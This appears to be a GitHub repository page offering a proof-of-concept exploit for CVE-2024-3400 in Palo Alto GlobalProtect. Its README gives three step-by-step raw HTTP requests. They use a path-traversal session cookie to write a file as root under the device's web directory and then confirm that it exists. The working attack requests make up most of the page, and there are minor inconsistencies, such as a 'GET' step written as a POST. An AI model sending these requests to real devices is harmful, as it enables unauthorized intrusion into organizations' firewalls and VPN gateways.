Skip to content

0xr2r/CVE-2024-3400-Palo-Alto-OS-Command-Injection

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits

README.md

README.md

 
 

exploit.txt

exploit.txt

 
 

Repository files navigation

#Steps :

#1. Check whether file (0xr2r.txt) is present on device by running below get request or We can verify same by openinig

https://domain.com/global-protect/portal/images/0xr2r.txt Url in browser if you get 404 response that means file is not present.



POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: domain.com
Cookie:  SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/0xr2r.txt
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

#2.now put file (0xr2r.txt) on device by running below post request . this will create file on device under given path with root assess.


POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: domain.com
Cookie:  SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/0xr2r.txt
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
user=0xr2r&portal=0xr2r&authcookie=284ad748-7ce2-4753-a39a-aa381b18cf70&domain=0xr2r&computer=0xr2r&client-ip=0xr2r&client-ipv6=0xr2r&md5-sum=0xr2r&gwHipReportCheck=0xr2r

#3. now again if you try to access the files you should receive 403 insted 404. this proves file (0xr2r.txt) is present on device with root access.


POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: domain.com
Cookie:  SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/0xr2r.txt
Content-Type: application/x-www-form-urlencoded
Content-Length: 170

user=0xr2r&portal=0xr2r&authcookie=284ad748-7ce2-4753-a39a-aa381b18cf70&domain=0xr2r&computer=0xr2r&client-ip=0xr2r&client-ipv6=0xr2r&md5-sum=0xr2r&gwHipReportCheck=0xr2r

About

No description, website, or topics provided.

Resources

Readme
Activity

Stars

2 stars

Watchers

1 watching

Forks

1 fork
Report repository

Releases

No releases published

Packages

No packages published